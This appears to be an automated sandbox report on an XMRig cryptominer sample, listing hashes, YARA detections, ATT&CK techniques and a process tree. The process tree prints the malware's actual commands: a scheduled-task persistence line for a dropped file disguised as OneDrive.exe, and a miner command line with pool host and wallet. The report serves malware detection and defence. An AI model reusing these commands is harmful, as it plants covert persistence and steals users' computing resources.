xmrig | 3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042

Analysis

max time kernel
4s
max time network
300s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
25/12/2023, 04:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe
Size

2.1MB
MD5

93873e5c894e79df6922d2ec95d97b10
SHA1

76d6c12bed4db10242ec6da68c9a2ffdf543061a
SHA256

3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042
SHA512

238151ab9143d57f7cc2f419efd03022b1d73c436295ca101871064671d4254e2bbc546afdb6ca9ddf07e1bf7b89b1b2ec70ffadb63f40667d3e5f6668e2b63f
SSDEEP

49152:WOpNKrf9VNvk53Kli7Ib1Ei3LMespDC5ASTwhlItlW:WOvKBVNvq3x4twespDC5Lkm6

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

resource	yara_rule
behavioral2/memory/4288-81-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4288-80-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4288-123-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
1140	OneDrive.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4288-76-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4288-81-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4288-80-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4288-72-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4288-70-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4288-123-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4316	schtasks.exe
436	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1740	timeout.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
996	3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe
996	3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe
1140	OneDrive.exe
1140	OneDrive.exe
1140	OneDrive.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	996	3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe
Token: SeDebugPrivilege	1140	OneDrive.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 996 wrote to memory of 4764	996	3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe	17
PID 996 wrote to memory of 4764	996	3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe	17
PID 4764 wrote to memory of 1740	4764	cmd.exe	15
PID 4764 wrote to memory of 1740	4764	cmd.exe	15
PID 4764 wrote to memory of 1140	4764	cmd.exe	60
PID 4764 wrote to memory of 1140	4764	cmd.exe	60
PID 1140 wrote to memory of 2312	1140	OneDrive.exe	58
PID 1140 wrote to memory of 2312	1140	OneDrive.exe	58
PID 2312 wrote to memory of 4316	2312	cmd.exe	56
PID 2312 wrote to memory of 4316	2312	cmd.exe	56

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe
"C:\Users\Admin\AppData\Local\Temp\3bc814405b3f7a178ee8bb74d40ae9a643fe76d59a89982728673f2a78947042.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6AA1.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4764
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1140

C:\Windows\system32\timeout.exe
timeout 3
1⤵
- Delays execution with timeout.exe
PID:1740

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
1⤵
- Creates scheduled task(s)
PID:4316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2312

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
1⤵
PID:4288

C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
1⤵
PID:3880
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
  2⤵
  PID:1904
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
    3⤵
    - Creates scheduled task(s)
    PID:436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
72KB

MD5
90d5e6b298a449bc7a12e32ed2ab0b36

SHA1
8dac7332a138fd16fd5c1889924fd5a8058cb040

SHA256
4a6f2af85fc74a66965f791911d42d050daf2544664377944047c72dcfb5a68d

SHA512
caa29dbce1e9846d9e1c3fb641aad4cd942366252b49fd854eff0e7ece2d20a59ef5175bea747f4f66b98320eca6a7f719523af7f0aa3dc66cedcfceb99cb7cd

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
92KB

MD5
f0707b8cf6d5ce952c031ccd4b959d5c

SHA1
f6cba5782d300f2ab68e27b8e228588531dc9ae3

SHA256
78733d3f67a35218ea9e9a57d6d474862b0892cd3dc177830d5e19f431d0c055

SHA512
1e0134e2ed3e0f391f0f869f4b00822a2273e630d5fa5d1669155797f5359b5583b189ed74af7a630a69fabb2ff5788fb35152e2426f3e4e626215e6e406acb1

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
102KB

MD5
c7a5ca2fb2dd5345400789e2ad85a41f

SHA1
be76bac759bf60106341ba2b1780da85cd28dc0f

SHA256
2c3309edabd7a561cfd10a5eb6cbfbb2f5f71a3387d14cda7f6097bb3cdb88e0

SHA512
3c89bcf73932ee3ee324416845fcbe4159a92ebb716ed271712f85fb69d8d07e1a63db1d00d3196e140b050ec0f36e379d5db9006260c1e9b61be4ea7b9043f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OneDrive.exe.log

Filesize
1KB

MD5
879faeecba1716ac3ad7bc3662ffb86e

SHA1
0f489962ae42883915d16449b881e4eb57ec7f9e

SHA256
ca38f4cb9f7b3c256a481fd8c86540558a0d9872ba1fc19181483ea5811ced68

SHA512
542c9501d4583b86dfacd89e33c31265f2385cb3461fe41d80aeb83d415c2480144a8371ef23175284645569bec1a1274772d1b640d9fab4d002e78740216966

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6AA1.tmp.bat

Filesize
176B

MD5
e0d328d816d78e244bc75eb15d81476f

SHA1
2e750a9910e3fc5b24dd01f8aab66f9a84664c57

SHA256
89cb06325efd1ec01ebbab7dc2881011a283371440596be829ca618f28672219

SHA512
12849c3442da2872aa6fdeb654bae3453d753c1a0c427db62117ad4be50226343d9020c74f96d000c0b83166964b138829816c90593f1ad3adf622db91aa2422

Download Submit
memory/996-36-0x00007FFC45FE0000-0x00007FFC4607C000-memory.dmp

Filesize
624KB

Download
memory/996-32-0x00007FFC4EB50000-0x00007FFC4EC9A000-memory.dmp

Filesize
1.3MB

Download
memory/996-10-0x00007FFC4EB50000-0x00007FFC4EC9A000-memory.dmp

Filesize
1.3MB

Download
memory/996-23-0x00007FFC4F340000-0x00007FFC4F51B000-memory.dmp

Filesize
1.9MB

Download
memory/996-27-0x00007FFC4CC80000-0x00007FFC4CF79000-memory.dmp

Filesize
3.0MB

Download
memory/996-31-0x00007FFC4ED00000-0x00007FFC4ED27000-memory.dmp

Filesize
156KB

Download
memory/996-37-0x00007FFC40930000-0x00007FFC4093A000-memory.dmp

Filesize
40KB

Download
memory/996-42-0x00007FF7F2190000-0x00007FF7F2394000-memory.dmp

Filesize
2.0MB

Download
memory/996-43-0x0000000003030000-0x0000000003075000-memory.dmp

Filesize
276KB

Download
memory/996-41-0x00007FFC41D90000-0x00007FFC41EBC000-memory.dmp

Filesize
1.2MB

Download
memory/996-40-0x00007FFC4E3C0000-0x00007FFC4E503000-memory.dmp

Filesize
1.3MB

Download
memory/996-39-0x00007FFC41F20000-0x00007FFC42017000-memory.dmp

Filesize
988KB

Download
memory/996-38-0x00007FFC31FF0000-0x00007FFC329DC000-memory.dmp

Filesize
9.9MB

Download
memory/996-14-0x00007FF7F2190000-0x00007FF7F2394000-memory.dmp

Filesize
2.0MB

Download
memory/996-34-0x00007FFC46080000-0x00007FFC460E3000-memory.dmp

Filesize
396KB

Download
memory/996-11-0x00007FFC4B820000-0x00007FFC4B831000-memory.dmp

Filesize
68KB

Download
memory/996-30-0x00007FFC4C9D0000-0x00007FFC4CA21000-memory.dmp

Filesize
324KB

Download
memory/996-28-0x00007FFC4BF60000-0x00007FFC4BFCA000-memory.dmp

Filesize
424KB

Download
memory/996-29-0x00007FFC4EA20000-0x00007FFC4EAC1000-memory.dmp

Filesize
644KB

Download
memory/996-26-0x00007FFC4EDD0000-0x00007FFC4EEF5000-memory.dmp

Filesize
1.1MB

Download
memory/996-25-0x00007FFC4ED30000-0x00007FFC4EDCD000-memory.dmp

Filesize
628KB

Download
memory/996-24-0x00007FFC4C1B0000-0x00007FFC4C3F9000-memory.dmp

Filesize
2.3MB

Download
memory/996-15-0x00007FFC31FF0000-0x00007FFC329DC000-memory.dmp

Filesize
9.9MB

Download
memory/996-16-0x00007FFC41D90000-0x00007FFC41EBC000-memory.dmp

Filesize
1.2MB

Download
memory/996-9-0x00007FFC4ED00000-0x00007FFC4ED27000-memory.dmp

Filesize
156KB

Download
memory/996-8-0x00007FFC4ED30000-0x00007FFC4EDCD000-memory.dmp

Filesize
628KB

Download
memory/996-7-0x00007FFC45FE0000-0x00007FFC4607C000-memory.dmp

Filesize
624KB

Download
memory/996-6-0x0000000003030000-0x0000000003075000-memory.dmp

Filesize
276KB

Download
memory/996-0-0x00007FF7F2190000-0x00007FF7F2394000-memory.dmp

Filesize
2.0MB

Download
memory/996-13-0x00007FFC31FF0000-0x00007FFC329DC000-memory.dmp

Filesize
9.9MB

Download
memory/996-12-0x00007FFC41F20000-0x00007FFC42017000-memory.dmp

Filesize
988KB

Download
memory/996-2-0x0000000003030000-0x0000000003075000-memory.dmp

Filesize
276KB

Download
memory/1140-55-0x00007FFC4ED30000-0x00007FFC4EDCD000-memory.dmp

Filesize
628KB

Download
memory/1140-110-0x00007FF7B74E0000-0x00007FF7B76E4000-memory.dmp

Filesize
2.0MB

Download
memory/1140-62-0x00007FFC41D90000-0x00007FFC41EBC000-memory.dmp

Filesize
1.2MB

Download
memory/1140-60-0x00007FFC31FF0000-0x00007FFC329DC000-memory.dmp

Filesize
9.9MB

Download
memory/1140-59-0x00007FFC41F20000-0x00007FFC42017000-memory.dmp

Filesize
988KB

Download
memory/1140-57-0x00007FFC4EB50000-0x00007FFC4EC9A000-memory.dmp

Filesize
1.3MB

Download
memory/1140-56-0x00007FFC4ED00000-0x00007FFC4ED27000-memory.dmp

Filesize
156KB

Download
memory/1140-65-0x000000001CBF0000-0x000000001CC00000-memory.dmp

Filesize
64KB

Download
memory/1140-54-0x00007FFC45FE0000-0x00007FFC4607C000-memory.dmp

Filesize
624KB

Download
memory/1140-50-0x0000000003710000-0x0000000003755000-memory.dmp

Filesize
276KB

Download
memory/1140-49-0x0000000003710000-0x0000000003755000-memory.dmp

Filesize
276KB

Download
memory/1140-67-0x00007FFC41850000-0x00007FFC4191C000-memory.dmp

Filesize
816KB

Download
memory/1140-69-0x00007FFC4AE00000-0x00007FFC4AE37000-memory.dmp

Filesize
220KB

Download
memory/1140-68-0x00007FFC4E9B0000-0x00007FFC4EA1C000-memory.dmp

Filesize
432KB

Download
memory/1140-66-0x00007FFC45F20000-0x00007FFC45F45000-memory.dmp

Filesize
148KB

Download
memory/1140-47-0x00007FF7B74E0000-0x00007FF7B76E4000-memory.dmp

Filesize
2.0MB

Download
memory/1140-77-0x00007FFC4ED30000-0x00007FFC4EDCD000-memory.dmp

Filesize
628KB

Download
memory/1140-82-0x00007FFC4BF60000-0x00007FFC4BFCA000-memory.dmp

Filesize
424KB

Download
memory/1140-88-0x00007FFC4EB50000-0x00007FFC4EC9A000-memory.dmp

Filesize
1.3MB

Download
memory/1140-87-0x00007FFC4C400000-0x00007FFC4C49A000-memory.dmp

Filesize
616KB

Download
memory/1140-86-0x00007FFC4ED00000-0x00007FFC4ED27000-memory.dmp

Filesize
156KB

Download
memory/1140-85-0x00007FFC4C9D0000-0x00007FFC4CA21000-memory.dmp

Filesize
324KB

Download
memory/1140-84-0x00007FFC4EA20000-0x00007FFC4EAC1000-memory.dmp

Filesize
644KB

Download
memory/1140-109-0x0000000003710000-0x0000000003755000-memory.dmp

Filesize
276KB

Download
memory/1140-58-0x00007FFC4B820000-0x00007FFC4B831000-memory.dmp

Filesize
68KB

Download
memory/1140-61-0x00007FF7B74E0000-0x00007FF7B76E4000-memory.dmp

Filesize
2.0MB

Download
memory/1140-111-0x00007FFC31FF0000-0x00007FFC329DC000-memory.dmp

Filesize
9.9MB

Download
memory/1140-64-0x00007FFC4B680000-0x00007FFC4B6A5000-memory.dmp

Filesize
148KB

Download
memory/1140-79-0x00007FFC4CC80000-0x00007FFC4CF79000-memory.dmp

Filesize
3.0MB

Download
memory/1140-63-0x00007FFC31FF0000-0x00007FFC329DC000-memory.dmp

Filesize
9.9MB

Download
memory/1140-74-0x00007FFC4F340000-0x00007FFC4F51B000-memory.dmp

Filesize
1.9MB

Download
memory/1140-78-0x00007FFC4EDD0000-0x00007FFC4EEF5000-memory.dmp

Filesize
1.1MB

Download
memory/1140-75-0x00007FFC4C1B0000-0x00007FFC4C3F9000-memory.dmp

Filesize
2.3MB

Download
memory/3880-143-0x00007FF7B74E0000-0x00007FF7B76E4000-memory.dmp

Filesize
2.0MB

Download
memory/3880-127-0x00007FF7B74E0000-0x00007FF7B76E4000-memory.dmp

Filesize
2.0MB

Download
memory/3880-170-0x00007FF7B74E0000-0x00007FF7B76E4000-memory.dmp

Filesize
2.0MB

Download
memory/3880-172-0x00007FFC43880000-0x00007FFC4426C000-memory.dmp

Filesize
9.9MB

Download
memory/3880-171-0x0000000002F70000-0x0000000002FB5000-memory.dmp

Filesize
276KB

Download
memory/3880-147-0x000000001C4A0000-0x000000001C4B0000-memory.dmp

Filesize
64KB

Download
memory/3880-128-0x0000000002F70000-0x0000000002FB5000-memory.dmp

Filesize
276KB

Download
memory/3880-142-0x00007FFC43880000-0x00007FFC4426C000-memory.dmp

Filesize
9.9MB

Download
memory/3880-144-0x00007FF7B74E0000-0x00007FF7B76E4000-memory.dmp

Filesize
2.0MB

Download
memory/4288-121-0x000001C6CFD60000-0x000001C6CFD80000-memory.dmp

Filesize
128KB

Download
memory/4288-72-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4288-81-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4288-124-0x000001C6CFD60000-0x000001C6CFD80000-memory.dmp

Filesize
128KB

Download
memory/4288-76-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4288-125-0x000001C7623E0000-0x000001C762400000-memory.dmp

Filesize
128KB

Download
memory/4288-80-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4288-123-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4288-122-0x000001C7623E0000-0x000001C762400000-memory.dmp

Filesize
128KB

Download
memory/4288-116-0x000001C6CFD40000-0x000001C6CFD60000-memory.dmp

Filesize
128KB

Download
memory/4288-83-0x000001C6CE300000-0x000001C6CE320000-memory.dmp

Filesize
128KB

Download
memory/4288-70-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download